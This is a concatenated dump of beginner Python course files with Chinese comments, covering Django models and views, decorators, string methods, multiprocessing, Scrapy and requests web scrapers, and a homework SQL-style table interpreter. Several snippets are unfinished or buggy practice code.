Migration(migrations.Migration): dependencies = [ ('fault_reporting', '0001_initial'), ] operations = [ migrations.CreateModel( name='Comment', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('content', models.CharField(max_length=255)), ('create_time', models.DateTimeField(auto_now_add=True)), ], options={ 'verbose_name': '评论', 'verbose_name_plural': '评论', }, ), migrations.CreateModel( name='Fault2Tag', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ], options={ 'verbose_name': '故障-标签', 'verbose_name_plural': '故障-标签', }, ), migrations.CreateModel( name='FaultDetail', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('content', models.TextField()), ], options={ 'verbose_name': '故障详情表', 'verbose_name_plural': '故障详情表', }, ), migrations.CreateModel( name='FaultReport', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=80, verbose_name='故障标题')), ('desc', models.CharField(max_length=255, verbose_name='故障简介')), ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='发布时间')), ('modify_time', models.DateTimeField(auto_now=True, verbose_name='最后修改时间')), ('comment_count', models.IntegerField(default=0)), ('up_count', models.IntegerField(default=0)), ('down_count', models.IntegerField(default=0)), ], options={ 'verbose_name': '故障总结/故障报告', 'verbose_name_plural': '故障总结/故障报告', }, ), migrations.CreateModel( name='LOB', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=32, unique=True, verbose_name='业务线名称')), ], options={ 'verbose_name': '业务线', 'verbose_name_plural': '业务线', }, ), migrations.CreateModel( name='Tag', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=32, unique=True, verbose_name='标签名称')), ], options={ 'verbose_name': '标签', 'verbose_name_plural': '标签', }, ), migrations.CreateModel( name='UpDown', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('is_up', models.BooleanField(default=True, verbose_name='支持/反对')), ('fault_report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.FaultReport', verbose_name='故障总结')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.UserInfo', verbose_name='用户')), ], options={ 'verbose_name': '支持/反对', 'verbose_name_plural': '支持/反对', }, ), migrations.AddField( model_name='faultreport', name='lob', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.LOB', verbose_name='所属业务线'), ), migrations.AddField( model_name='faultreport', name='tags', field=models.ManyToManyField(through='fault_reporting.Fault2Tag', to='fault_reporting.Tag'), ), migrations.AddField( model_name='faultreport', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.UserInfo', verbose_name='发布者'), ), migrations.AddField( model_name='faultdetail', name='fault', field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.FaultReport'), ), migrations.AddField( model_name='fault2tag', name='fault_report', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.FaultReport'), ), migrations.AddField( model_name='fault2tag', name='tag', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.Tag'), ), migrations.AddField( model_name='comment', name='fault_report', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.FaultReport', verbose_name='故障总结'), ), migrations.AddField( model_name='comment', name='parent_comment', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.Comment'), ), migrations.AddField( model_name='comment', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.UserInfo'), ), migrations.AlterUniqueTogether( name='updown', unique_together=set([('fault_report', 'user')]), ), migrations.AlterUniqueTogether( name='fault2tag', unique_together=set([('fault_report', 'tag')]), ), ] <file_sep>/day4/3.装饰器.py # 装饰器 # 在原有的函数前后增加功能,且不改变原函数的调用方式 # 计算一个函数的运行之间 # import time # def timmer(f): # def inner(*args,**kwargs): # start_time = time.time() # ret = f(*args,**kwargs) # end_time = time.time() # print(end_time - start_time) # return ret # return inner # # @timmer # func = timmer(func) # def func(a,b): # print('begin func',a) # time.sleep(0.1) # print('end func',b) # return True # # ret = func(1,2) #--> inner() # def timmer(f): # def inner(*args,**kwargs): # # ret = f(*args,**kwargs) # # return ret # return inner # 进阶的需求 # 第一种情况 # 500个函数 # 你可以设计你的装饰器 来确认是否生效 # import time # FLAG = True # def outer(flag): # def timmer(f): # def inner(*args,**kwargs): # if flag == True: # start_time = time.time() # ret = f(*args,**kwargs) # end_time = time.time() # print(end_time - start_time) # else: # ret = f(*args, **kwargs) # return ret # return inner # return timmer # # @outer(FLAG) # func = timmer(func) # def func(a,b): # print('begin func',a) # time.sleep(0.1) # print('end func',b) # return True # # func(1,2) # 第二种情况 def wrapper1(func): def inner1(): print('wrapper1 ,before func') func() print('wrapper1 ,after func') return inner1 def wrapper2(func): def inner2(): print('wrapper2 ,before func') func() print('wrapper2 ,after func') return inner2 @wrapper2 @wrapper1 def f(): print('in f') # f() # 装饰器 登录 记录日志 import time login_info = {'alex':False} def login(func): # manager def inner(name): if login_info[name] != True: user = input('user :') pwd = input('pwd :') if user == 'alex' and pwd == '<PASSWORD>': login_info[name] = True if login_info[name] == True: ret = func(name) # timmer中的inner return ret return inner def timmer(f): def inner(*args,**kwargs): start_time = time.time() ret = f(*args,**kwargs) # 调用被装饰的方法 end_time = time.time() # print(end_time - start_time) return ret return inner @login @timmer def index(name): print('欢迎%s来到博客园首页~'%name) @login @timmer # manager = login(manager) def manager(name): print('欢迎%s来到博客园管理页~'%name) index('alex') index('alex') manager('alex') manager('alex') # 计算index 和 manager的执行时间 <file_sep>/day9/socket_server.py import time import socketserver class Myserver(socketserver.BaseRequestHandler): def handle(self): self.data=self.request.recv(1024).strip() self.data=self.r print(self.data) myserver=socketserver.ThreadingTCPServer(('127.0.0.1',9000),Myserver) myserver.serve_forever() <file_sep>/day19/form/app01/models.py from django.db import models # Create your models here. # Create your models here. class Publisher(models.Model): name=models.CharField(max_length=32,unique=True,verbose_name="出版社名字") # 字段显示中文需要用verbose_name address=models.TextField(verbose_name="出版社地址") def __str__(self): # 页面显示详细信息需要写这个 return self.name class Meta: # 表名显示中文 verbose_name="出版社" verbose_name_plural=verbose_name # 复数的意思,如果不加这个后面会多个s class Author(models.Model): name=models.CharField(max_length=12) gender=models.SmallIntegerField( choices=((0,"女"),(1,"男"),(2,"保密")), default=2 ) age=models.IntegerField() def __str__(self): return self.name class Meta: verbose_name="作者" verbose_name_plural = verbose_name class Book(models.Model): title=models.CharField(max_length=32,unique=True) publisher_date=models.DateField(auto_now_add=True) phone=models.CharField(max_length=11,unique=True,null=True,blank=True) # blank可以不填 publisher=models.ForeignKey(to="Publisher",on_delete=models.CASCADE) # 外键 authors=models.ManyToManyField(to="Author") # 多对多 def __str__(self): return self.title class Meta: verbose_name = "书名" verbose_name_plural = verbose_name<file_sep>/day2/01str.py s = 'python自动化21期' # 切片 #s[起始索引:结束索引+1:步长] # s1 = s[:6] # print (s1) # # s2 = s[6:9] # print (s2) # print(s[0:]) ##默认到最后 # # print (s[:-1]) ##-1代表最后一个,但是不打印最后一个 # # print (s[0:5:2]) ##每隔1个打印一次 2 就代表步长 # print (s[5:0:-2]) ##反向加步长,倒着取值 # s = 'oldBoy' # * capitalize()首字母大写,其他字母小写 s1 = s.capitalize() # print (s1) # # *** 全部大写upper() 全部小写lower() s2 = s.upper() s3 = s.lower() print (s2,s3) #例子 输入验证码不区分大小写 # code = 'Qear'.lower() # your_cold=input('请输入验证码:') # if your_cold == code: # print ('验证成功') # else: # print ('验证不成功') #* 大小写反转 swapcase() s4 = s.swapcase() print (s4) #*非字母的元素隔开的每个单词首字母大写 title() ss = '<NAME>*oldboy3taibia' s5 = ss.title() print (s5) # center 居中,长度自己设定,默认填充物None s6 = s.center(30,'*') print (s6) # *** startswith endswith 以什么开头,以什么结尾 s7 = s.startswith('o') print (s7) ##如果是真,则返回true s8 = s.endswith('y') print (s8) ##同上 # *** strip 去除首尾的空格,制表符\t,换行符。不仅仅是去除空格.... # rstrip 去除右边,lstrip 去除左边 s = 'tyoyldBoyrte' # # print(s) # s8 = s.strip() # print(s8) # s81 = s.strip('t') # # print(s81) # s81 = s.strip('tey') ##把字符串里面的tey给去掉了,从左往右依次执行 # print(s81) #例子: # name = input('>>>').strip() ##输入用户名的时候自动去除空格,可以防止用户输错 # if name == 'oldboy': # print('验证成功') #*** split (str ---> list) # s1 = 'oldboy,wusir,alex' # b = 'oldboywusiroalex' # l = b.split() # print(l) # l = s1.split(',') ##以逗号为分隔符,让s1变成了列表 # print(l) # l2 = b.split('o') # ['', 'ldb', 'ywusir', 'alex']b # print(l2) # # l3 = b.split('o',1) # ['', 'ldboywusiroalex'] # print(l3) #join 将list --->str sa = 'oldBoy' s9 = '+'.join(sa) ##用‘+’号把字符串连接起来 print(s9) l1 = ['oldboy','wusir','alex'] s91 = '_'.join(l1) ##用'_'把字符串连接起来 print(s91) # #replace 替换 h = '我们都是好孩子' h1 = h.replace('我','你') print(h1) #find 通过元素找索引 找不到返回-1 # index 通过元素找索引 找不到报错 u = 'odlabced' u1 = u.find('g') print(u1) # u2 = u.index('g') # print (u2) ##字符串格式化输出format # res='我叫{}今年{}岁,爱好{}'.format('egon',18,'male') # print(res) res='我叫{0}今年{1}岁,爱好{2},我依然叫{0}'.format('egon',18,'male') print(res) # res='{name} {age} {sex}'.format(sex='male', name='egon', age=18) # print(res) ##公共方法 #len count n = 'dfdfdfdfsdfsf' n1=len(n) print (n1) ##返回字符串的长度 n2 = n.count('d') ##统计字母d出现了几次 print (n2) ##判断字符串的类型 name = 'jinxin989' print (name.isalnum()) ## 判段字符串由字母或数字组成 print (name.isdigit()) ##是否只有字母 print (name.isalpha()) ##是否只有数字 #例子 i = '123a' if i.isdigit(): i = int(i) else: print("输入有误...") <file_sep>/day1/作业.py # name = input ('请输入你的姓名:') # sex = input ('请输入你的性别:') # print ('我的名字是' +name ,'我的性别是' +sex) # a = '你好,' # b = '朋友' # c = a + b # print(c) # name = input('请输入你的名字:') # age = input('请输入你的年龄:') # job = input('请输入你的工作:') # hobby = input('请输入你的爱好:') # msg1 = ''' ------------ info of %s ----------- # Name : %s # Age : %d # job : %s # Hobbie: %s # ------------- end ----------------- # ''' % (name,name,int(age),job,hobby) # print(msg1) # #1 一个条件 # if 2 > 1 : # print(666) # # # #2 一个条件两种结果 # if 2 < 1: # print(666) # else: # print(555) # # #3 多种条件选一个结果 # num = int(input('猜一下数字:')) # if num == 6: # print('请你吃饭') # elif num == 3: # print('请你喝酒') # elif num == 1: # print('请你唱歌') # #4 多种条件必选一个结果 # num = int(input('猜一下数字:')) # if num == 6: # print('请你吃饭') # elif num == 3: # print('请你喝酒') # elif num == 1: # print('请你唱歌') # else: # print('没机会了.....') # while True: # print('凉凉') # print('黄昏') # print('我有一个道姑朋友') #打印1到100,当小于等于100的时候可以一直打印,否则就退出 # count = 1 # while count <= 100: # print(count) # count = count + 1 ##打印1到100的数字之和 # count = 0 # sum = 1 # while count <101: # # sum=sum+count # count += 1 # # print (sum) # while True: # print(333) # print(5455) # print(222) # break # print(888) # print(666) # while True: # print(333) # print(5455) # print(222) # continue # print(888) # print(666) # count = 1 # while count < 5: # print(count) # count += 1 # else: # print('循环正常完毕') # s = 'fdsanmnxfdfd' # for i in s: # if i == 'a':pass # print(i) # else: # print(666) #练习 #使用while循环输入 1 2 3 4 5 6 8 9 10 # i = 0 # while i <10: # # i+=1 # if i ==7: # continue # # # print (i) #输出 1-100 内的所有偶数 # i = 0 # while i<101: # if i%2==0: # print (i) # i+=1 #输出1-100内的奇数 # i = 0 # while i<101: # if i%2!=0: # print (i) # i+=1 #求1-2+3-4+5 ... 99的所有数的和 奇数和偶数 # i=0 # sum=0 # while i < 100: # if i%2==0 : # sum=sum+i # #print (sum) # i+=1 # else: # sum=sum-i # i+=1 # #print (sum) # print (sum) # # # # # li = [{'username':'alex','password':'SB'}, # {'username':'wusir','password':'sb'}, # {'username':'taibai','password':'123'},] # a=0 # b=0 # while a < 3: # # username = input("请输入你的用户名:") # passwd = input("请输入你的密码:") # for i in li: # # if username == i['username'] and passwd == i['password']: # print('登录成功') # exit() # else: # print("登录失败请重新登录") # a += 1 # b += 1 # if a == 3:##当第一次的机会用完之后,在给她三次机会 # a=0 # if b == 6: ##当b=6的时候就已经循环了两次,所有退出占整个循环 # print ("你的六次机会已经全部用完,拜拜!") # break # m=input("还可以给你三次机会,请输入Y:") # if m=="Y": # continue # else: # print ("臭不要脸,你已经放弃了在玩三次的机会。") # break # <file_sep>/day27/s21crm/crm/views/depart.py from django.shortcuts import render, redirect from crm import models from crm.forms.depart import DepartModelForm from django.urls import reverse def depart_list(request): """ 部门列表 :param request: :return: """ queryset = models.Department.objects.all() return render(request, 'depart_list.html', {'queryset': queryset}) def depart_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = DepartModelForm() return render(request, 'depart_add.html', {'form': form}) form = DepartModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('depart_list') else: return render(request, 'depart_add.html', {'form': form}) def depart_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Department.objects.filter(id=nid).first() if request.method == "GET": form = DepartModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'depart_edit.html', {"form": form}) form = DepartModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('depart_list') else: return render(request, 'depart_edit.html', {"form": form}) def depart_del(request,nid): """ 删除用户 :param request: :param nid: :return: """ models.Department.objects.filter(id=nid).delete() return redirect('depart_list') <file_sep>/day26/scrapy框架/choutiall/choutiall/spiders/chouti.py # -*- coding: utf-8 -*- import scrapy from choutiall.items import ChoutiallItem class ChoutiSpider(scrapy.Spider): name = 'chouti' # allowed_domains = ['www.xxx.com'] start_urls = ['https://dig.chouti.com/r/pic/hot/1'] # 设计一个所有页码通用的url url='https://dig.chouti.com/r/pic/hot/%d' pageNum=1 def parse(self, response): div_list = response.xpath('//div[@class="content-list"]/div') for div in div_list: title = div.xpath('./div[3]/div[1]/a/text()').extract_first() item = ChoutiallItem() # 实例化items item['title'] = title # 列表形式 yield item # 进行其他页码对应url的请求操作 if self.pageNum <= 120: self.pageNum += 1 url = format(self.url % self.pageNum) # print(url) # 进行手动请求的发送 yield scrapy.Request(url=url, callback=self.parse) #调用上面的parse方法去解析所有的页面 <file_sep>/day22/new/app01/views.py from django.shortcuts import render, HttpResponse, redirect from django.conf import settings from rbac.service.permission import init_permission from rbac.models import UserInfo # Create your views here. def login(request): if request.method == "POST": username = request.POST.get("username") pwd = request.POST.get("password") user_obj = UserInfo.objects.filter(username=username, password=pwd).first() if user_obj: # 登录成功 # 初始化权限信息 init_permission(request, user_obj) return redirect("/book_list/") return render(request, "login.html") def book_list(request): return render(request, "book_list.html") def book_add(request): return render(request, "book_add.html") <file_sep>/day9/进程/数据共享.py from multiprocessing import Manager,Process,Lock #manager 可以实现数据共享 (不重要) def work(d,lock): with lock: #锁的简写 d['count']-=1 if __name__ == '__main__': lock=Lock() m=Manager() dic=m.dict({'count':100}) l=[] for i in range(10): p=Process(target=work,args=(dic,lock,)) l.append(p) p.start() for p in l: p.join() print(dic) <file_sep>/day9/进程/进程池.py #提交任务的两种方式: #同步调用:提交完任务后,就在原地等待,等待任务执行完毕,拿到任务的返回值,才能继续下一行代码,导致程序串行执行 #异步调用+回调机制:提交完任务后,不在原地等待,任务一旦执行完毕就会触发回调函数的执行, 程序是并发执行 import time from concurrent.futures import ProcessPoolExecutor import random,os # def func(num): # print(num) # time.sleep(1) # print(num) # if __name__ == '__main__': # t=ProcessPoolExecutor(20)#开启20个进程 # for i in range(50): # t.submit(func,i) # t.shutdown() # print('done') #同步调用 def task(n): print('%s is runing'%os.getpid()) time.sleep(random.randint(1,3)) return n**2 def handle(res): print('handle res %s' %res) if __name__ == '__main__': pool=ProcessPoolExecutor(3) for i in range(5): res=pool.submit(task,i).result() handle(res) pool.shutdown() print('主') #异步调用 # def task(n): # print('%s is runing'%os.getpid()) # time.sleep(random.randint(1,3)) # return n**2 # def handle(res): # res=res.result() # print('handle res %s' %res) # if __name__ == '__main__': # pool=ProcessPoolExecutor(2) # for i in range(5): # obj=pool.submit(task,i) # obj.add_done_callback(handle) # # pool.shutdown() # print('主') <file_sep>/day25/homework/校花网作业/爬取校花网图片.py import requests from lxml import etree import os path = r'D:\python21\python\day25\homework\校花网作业' # 获取url url = 'http://www.521609.com/daxuemeinv/list%s.html' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } # 创建文件夹 if not os.path.exists('img'): os.mkdir('img') for page in range(81, 824): print('正在下载第%d页图片' % page) new_url = format(url % page) # print(new_url) response = requests.get(url=new_url, headers=headers) page_text = response.text # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_text) div_list = tree.xpath('//div[@class="index_img list_center"]/ul//li') # print(div_list) # 写入到文件 for div in div_list: img_url = div.xpath('//div[@class="index_img list_center"]//li/a//@src') # print(img_url) for eve_url in img_url: img_full_url = 'http://www.521609.com' + eve_url img_data = requests.get(url=img_full_url, headers=headers,timeout = 500).content img_name = img_full_url.split('/')[-1] img_path = 'img/' + img_name with open(img_path, 'ab')as f: f.write(img_data) <file_sep>/day17/lianxi/app01/migrations/0002_person.py # -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-08-13 13:16 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app01', '0001_initial'), ] operations = [ migrations.CreateModel( name='Person', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=22)), ('age', models.IntegerField()), ('birthday', models.DateField()), ('birthday2', models.DateTimeField(null=True)), ('phone', models.CharField(max_length=11, unique=True)), ('join_date', models.DateField(auto_now_add=True)), ('last_date', models.DateField(auto_now=True)), ], ), ] <file_sep>/day19/form之前/app01/views.py from django.shortcuts import render,redirect from app01 import models # Create your views here. def book_list(request): book_obj=models.Book.objects.all() return render(request,"book_list.html",{"book_obj":book_obj}) def add_book(request): if request.method=="GET": publisher_list=models.Publisher.objects.all() author_list=models.Author.objects.all() return render(request,"add_book.html",{"publisher_list":publisher_list,"author_list":author_list}) else: title=request.POST.get("title") publish_data=request.POST.get("publish_date") phone=request.POST.get("phone") publisher=request.POST.get("publisher") authors=request.POST.getlist("authors") #去数据库创建 book_obj=models.Book.objects.create( title=title, publisher_date=publish_data, publisher_id=publisher, ) book_obj.authors.add(*authors) return redirect("/book_list/") def edit_book(request,pk): book_obj = models.Book.objects.filter(id=pk).first() if request.method=="POST": title = request.POST.get("title") publish_data = request.POST.get("publish_date") phone = request.POST.get("phone") publisher = request.POST.get("publisher") print(publisher) authors = request.POST.getlist("authors") book_obj.title=title book_obj.publish_date=publish_data book_obj.phone=phone book_obj.publisher_id=publisher book_obj.save() book_obj.authors.set(authors) return redirect("/book_list/") else: publisher_list=models.Publisher.objects.all() author_list=models.Author.objects.all() return render(request,"edit_book.html",locals())<file_sep>/day23/auto - 2 - 固定二级菜单示例/web/templates/userlist.html {% extends 'layout.html' %} {% block js %} <link rel="stylesheet" href="../static/plugins/bootstrap/css/bootstrap.min.css"> {% endblock %} {% block content %} <div class="panel panel-success"> <div class="panel-heading">用户列表</div> <div class="panel-body"> <table class="table table-hover"> <tr> <th>序号</th> <th>用户名</th> <th>操作</th> </tr> {% for user in user_list %} <tr> <td>{{ forloop.counter }}</td> <td>{{ user.name }}</td> <td> <a class="btn btn-warning" href="/web/del_user/{{ user.id }}">删除</a> <a class="btn btn-info" href="/web/edit_user/{{ user.id }}">编辑</a> </td> </tr> {% endfor %} </table> <a class="btn btn-info" href="/web/add_user/">添加用户</a> </div> </div> <!-- --> {% endblock %}<file_sep>/day4/ceshi.py ##查询语句 # select id ,name, age from userinfo where age>22 # select * from userinfo where age>22 # select * from userinfo where age=25 # select * from userinfo where phone like 133 # ##下面这个不行 # select * from userinfo where job=IT ##更改语句 # update name='bob' from userinfo where age=25 # cmd = 'select * from userinfo' # a = cmd.split('from')[0].split()[1:] # if a==['*']: # print('ok') # else: # print('bad') # left_yuju="update age=35 from userinfo where name=wusir" # filter_cols = left_yuju.split('from')[0].split()[1].split('=') # res = [i.strip() for i in filter_cols] # print(filter_cols) # print(res) # b = ','.join(filter_cols) # print(b.strip()) #删除 #delete name=wusir from userinfo where age=35 # with open("userinfo","r",encoding="utf-8") as f: # lines = f.readlines() # # with open("userinfo","w",encoding="utf-8") as f2: # for line in lines: # if "wusir" in line: # continue # f2.write # b={'id': ['1', '2', '3'], 'name': ['Alex', 'Egon', 'wusir'], 'age': ['23', '24', '35'], # 'phone': ['13651054608', '13304320533', '1333235322'], 'job': ['IT\n', 'Tearcher\n', 'IT\n']} # # c=b.get('id') # #print(c) # d=b["id"].index('3') ##查出id索引 # c=b.get('name')[d] # print(c) #print(d) # f = b["name"][d]#根据id索引查出name对应的值 # print(b.get('id').pop(d)) # a=b.get('name').pop(d) # print(b.get("age").pop(d)) # print(b.get("phone").pop(d)) # print(b.get('job').pop(d)) # # print(a) # print(b) # print(f) # print(b['age'][d]) ##更新语句 #left_yuju='insert into userinfo id,name,age,phone,job values 8,jack,23,123456789,python' # # filter_index = left_yuju.split('userinfo')[-1].split('values')[:-1] #filter_values=left_yuju.split('values')[-1].split(',') # # print(filter_index,type(filter_index)) #print(filter_values) from tabulate import tabulate new_list=[] with open('userinfo',encoding='utf-8',mode='r') as f1: new_list.append(f1.readline()) print(new_list) # print(tabulate(new_list,tablefmt="grid")) # insert into userinfo id,name,age,phone,job values 5,jinxing,43,123456789,python<file_sep>/day26/scrapy框架/pipelinepro/pipelinepro/spiders/qiubai.py #执行方式 ,进入到项目的文件夹下,在执行scrapy crawl qiubai --nolog # -*- coding: utf-8 -*- import scrapy from pipelinepro.items import PipelineproItem class QiubaiSpider(scrapy.Spider): name = 'qiubai' # allowed_domains = ['www.xx.com'] start_urls = ['https://www.qiushibaike.com/'] def parse(self, response): # xpath返回的列表元素类型为Selecor类型 div_list = response.xpath('//div[@id="content-left"]/div') # 声明一个用于存储解析到数据的列表 all_data = [] for div in div_list: # extract()可以将selector对象中存储的文本内容获取 # author = div.xpath('./div[1]/a[2]/h2/text()')[0].extract() author = div.xpath('./div[1]/a[2]/h2/text()').extract_first() content = div.xpath('.//div[@class="content"]/span//text()').extract() content = "".join(content) # 实例化item对象 item = PipelineproItem() # 将解析到的数据值存储到item对象中 item['author'] = author item['content'] = content # 将item对象提交给管道 yield item # 持久化存储方式: # 1.基于终端指令:必须保证parse方法有一个可迭代类型对象的返回 # 2.基于管道: # 1.items.py:对该文件中的类进行实例化操作(item对象:存储解析到的数据值)。 # 2.pipeline.py:管道,作用就是接受爬虫文件提交的item对象,然后将该对象中的数据值进行持久化存储操作 <file_sep>/day4/优秀的作业/优秀的作业/张晶瑜/homework/homework.py import re, time, json, functools import pandas as pd from prettytable import PrettyTable """ 思路: 1.创建SqlSyntax类,初始化数据和字符串,用于处理select、insert、delete、set函数,用于处理字符串获取参数并返回 2.创建SqlHandle类,用于反射上述函数,接收其字符串参数和数据,并执行响应的增删改查函数,添加一些边角料 3.创建TableHandler类,用于执行循环,获取窗口输入的字符串,并调用sql_handler,返回结果 4.创建用户认证类 """ class SqlSyntax(object): """负责增删改查的SQL语句模块""" def __init__(self, ): self.string = "" self.dataSet = "" def select(self): """负责查找语句, 只识别 select **** where ****语句""" if "where" in self.string: par = re.compile(r"select(.+)where", flags=re.S) # 用匹出select和where里的关键字,注意有* str1 = re.match(par, self.string).group(1) condition = self.string.split("where")[-1].strip() else: str1 = self.string.split(" ", 1)[-1] condition = False if "*" in str1: keys = "*" else: keys = [r.strip() for r in str1.split(",")] return { "keys": keys, "condition": condition, } def insert(self): """ 负责插入语句, 只识别 insert (name="alex", age="10000") 和 insert("alex", "10000"),必须输入所有的信息""" par = re.compile(".*\((.+)\).*", re.S) # 匹配出insert 后面的内容 str1 = re.match(par, self.string).group(1) if "=" not in str1: # 说明都是元组,'"Alex", "10000"' keys = list(self.dataSet.columns) values = [self.strip(r) for r in str1.split(",")] # 必须除去'"alex"'或者"'alex'"外边的引号 dic = dict(zip(keys, values)) else: # 说明是'name="Alex", age="10000"'这种类型,要去掉双引号 dic = {r.split("=")[0].strip(): self.strip(r.split("=")[1]) for r in str1.split(",")} return dic def set(self): """负责修改语句, 只识别 set name="alex" where 条件""" par = re.compile(r"set(.+)where", flags=re.S) str1 = re.findall(par, self.string)[0] condition = self.string.split("where")[-1].strip() keys = {r.split("=")[0].strip(): self.strip(r.split("=")[1]) for r in str1.split(",")} return { "keys": keys, "condition": condition, } def delete(self): """负责删除语句, 只识别 delet * where id = 3""" condition = self.string.split("where")[-1].strip() return { "condition": condition, } def strip(self, string): return string.strip().strip("'").strip('"') class SqlHandler(SqlSyntax): def __init__(self): super(SqlHandler, self).__init__() self.__func_dict = dict( select=self.__select_handler, insert=self.__insert_handler, set=self.__set_handler, delete=self.__delete_handler, ) def sql_handler(self): try: func = self.string.split(" ", 1)[0] # 找到字符串的第一个字符 dic = getattr(self, func)() data = self.__func_dict[func](dic) # 执行相应的函数 print(self.__table(data)) self.dataSet.to_csv('table.txt', index=None) except Exception as e: self.__log("Error.The syntax is not correct.", e) def __select_handler(self, dic): """根据dic参数执行查询结果""" if dic["condition"]: if dic["keys"] == "*": data = self.__where(dic["condition"]) else: data = self.__where(dic["condition"])[dic["keys"]] else: if dic["keys"] == "*": data = self.dataSet else: data = self.dataSet[dic["keys"]] return data def __insert_handler(self, dic): """根据dic参数执行插入结果""" if dic["id"] in list(self.dataSet["id"]): self.__log("The id is already exist. Please input again.") if dic["name"] in list(self.dataSet["name"]): string = str(input("Warning: the name is already exist, surely insert it?")) if string in ["Y", "y", "yes", "YES", ""]: self.dataSet.loc[self.dataSet.shape[0]] = [dic.get(key) for key in list(self.dataSet.columns)] else: self.dataSet.loc[self.dataSet.shape[0]] = [dic.get(key) for key in list(self.dataSet.columns)] return self.dataSet def __set_handler(self, dic): """根据dic参数执行修改结果""" return self.__inset_and_delete(dic, "set") def __delete_handler(self, dic): # index = self.dataSet[self.dataSet["id"].isin(index)].index.tolist() # 删除 return self.__inset_and_delete(dic, "delete") def __where(self, condition): """处理语句""" key = re.match('^[<KEY>]+', condition).group(0) if "like" in condition: value = re.findall('[0-9a-zA-Z]+$', condition)[0] # 找到这个参数 str_v = [str(v) for v in list(self.dataSet[key])] a = [value in v for v in str_v] data = self.dataSet.loc[a, :] else: if "=" in condition: index = condition.index("=") condition = condition[: index] + "=" + condition[index: ] expression = 'self.dataSet["%s"]' % key string = condition.replace(key, expression) data = self.dataSet[eval(string)] return data def __inset_and_delete(self, dic, func_name): msg = self.dataSet.to_dict("records") value = re.findall('[0-9a-zA-Z]+$', dic["condition"])[0] key = re.findall('^[<KEY>', dic["condition"])[0] if func_name == "set": for row in msg: for k, v in dic["keys"].items(): if str(row.get(key)) == value: row[k] = v self.dataSet = pd.DataFrame(msg, columns=self.dataSet.columns) else: msg_new = [] for row in msg: if str(row.get(key)) == value: pass else: msg_new.append(row) self.dataSet = pd.DataFrame(msg_new, columns=self.dataSet.columns) self.dataSet.to_csv(self.table, index=None) return self.dataSet def __table(self, data): table = PrettyTable(list(data.columns)) for i in range(data.shape[0]): table.add_row(data.iloc[i, :]) return table def __log(self, *args, **kwargs): print("Log: ", *args, **kwargs) def __call__(self, string, table): self.string = string self.table = table try: self.dataSet = pd.read_csv(self.table, encoding='utf-8', header=0) except IOError: print("The table isn't correct.") def author(f): @functools.wraps(f) def decorator(*args, **kwargs): reader = functools.partial(open, encoding="utf-8", mode="r") file = reader("user.txt") user = [json.loads(line) for line in file.readlines()] count = 0 while True: username = str(input("请输入登录用户: ")) password = str(input("请输入登录密码: ")) if count > 3: break if {"username": username, "password": <PASSWORD>} not in user: print("Username or password not correct. Please try again.") count += 1 else: return f(*args, **kwargs) return decorator class TableHandler(object): """负责执行文件操作""" def __sql_handler(self, handler): while True: yield handler.sql_handler() @author def loop(self, table): """负责循环""" handler = SqlHandler() while True: string = str(input("%s SQL >>> " % time.strftime("%Y-%m-%d %X", time.localtime()))) handler(string, table) next(self.__sql_handler(handler)) if __name__ == '__main__': tb = TableHandler() tb.loop('table.txt') <file_sep>/day6/序列化.py # import pickle # # obj = ('北京','昌平沙河') # # # 序列化到文件 # with open("file","wb")as f: # pickle.dump(obj,f) # f.close() # # # #读取文件 # df = open('file','rb') # read = pickle.load(df) # df.close() import json f=open('file','w') a={'name':'北京','place':'昌平沙河'} json.loads(a,f,ensure_ascii=False) # ret = json.dumps(a,ensure_ascii=False) # print(ret)<file_sep>/day24/auto - 12 - 权限粒度控制到按钮/rbac/templatetags/rbac.py from django.template import Library from django.conf import settings register = Library() @register.filter def permission(name,request): # 权限相关的 if name in request.session.get(settings.RBAC_PERMISSION_SESSION_KEY): return True @register.inclusion_tag('rbac/menu.html') def get_menu(request): # 菜单相关 """ 动态生成二级菜单 :param request: :return: """ menu_dict = request.session.get(settings.RBAC_MENU_SESSION_KEY) # 去session里面获取菜单信息 """ { 1: { 'title': '用户管理', 'icon': 'fa-clipboard', 'class':'', 'children': [ {'title': '用户列表', 'url': '/app01/user/', 'name': 'user_list','class':'active'} ] }, 2: { 'title': 